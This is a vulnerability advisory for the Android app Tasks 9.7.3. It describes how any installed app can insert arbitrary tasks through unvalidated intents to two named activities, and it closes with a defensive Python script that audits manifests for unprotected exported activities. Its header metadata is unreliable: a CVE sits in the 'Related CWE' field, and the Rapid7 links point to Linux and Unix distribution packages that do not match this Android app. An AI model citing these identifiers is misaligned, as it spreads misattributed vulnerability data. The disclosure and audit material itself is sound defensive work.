Vendor: Tasks
By: Lyhin's Lab
CVSS: 5.9 (MEDIUM)
Insecure Permissions
CWE: 284
Product Name: Tasks
Affected Version From: 9.7.3
Affected Version To: 9.7.3
Patch Exists: YES
Related CWE: CVE-2020-14093
CPE: a:tasks:tasks:9.7.3
Metasploit:
https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-14093/, https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-14093/
Other Scripts:
N/A
Platforms Tested: Android 9
2020
Tasks 9.7.3 – Insecure Permissions
Any installed application on a victim's phone can add arbitrary tasks to the user's task list through insecure IPC handling. A malicious application can do this in several ways:
1. By sending multiple intents to the ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). The Tasks application adds the first requested 'task' to the user's task list.
2. By sending an intent to the VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate the intent's origin, so any application can append tasks to the user's task list.
We used the Drozer application to emulate malicious app activity.
Mitigation:
Ensure that all IPCs are properly validated and authenticated before allowing any action to be performed.
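To find components with the exposure described above, the following added example (not code from the Tasks project or from the advisory's authors) audits an AndroidManifest.xml for activities that any installed app can start without holding a permission. The manifest is a constructed sample: the package `org.example.tasks`, the `SettingsActivity` and `SyncActivity` entries, the permission name and the intent filter are assumptions, and only the two activity names derived from the quoted source paths come from this page.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest (NOT the real Tasks manifest). Only the first two
# activity names are derived from the source paths quoted in the advisory.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.example.tasks">
  <application>
    <activity android:name="com.todoroo.astrid.activity.ShareLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.SEND"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <data android:mimeType="text/plain"/>
      </intent-filter>
    </activity>
    <activity android:name="org.tasks.voice.VoiceCommandActivity"
              android:exported="true"/>
    <activity android:name="org.example.tasks.SettingsActivity"/>
    <activity android:name="org.example.tasks.SyncActivity"
              android:exported="true"
              android:permission="org.example.tasks.permission.SYNC"/>
  </application>
</manifest>
"""

def unprotected_exported_activities(manifest_xml):
    """Return names of activities another app can start without a permission."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for app in root.iter("application"):
        # An application-level permission is the default for every component.
        app_perm = app.get(ANDROID + "permission")
        for act in list(app.iter("activity")) + list(app.iter("activity-alias")):
            exported = act.get(ANDROID + "exported")
            if exported is None:
                # Before Android 12, an intent-filter implies exported="true".
                is_exported = act.find("intent-filter") is not None
            else:
                is_exported = exported.lower() == "true"
            if is_exported and not (act.get(ANDROID + "permission") or app_perm):
                findings.append(act.get(ANDROID + "name"))
    return findings

if __name__ == "__main__":
    for name in unprotected_exported_activities(SAMPLE_MANIFEST):
        print("exported without permission:", name)
```

A flagged activity is a review candidate rather than a confirmed bug: an exported entry point can be intentional, in which case its handler has to treat every incoming intent extra as untrusted input.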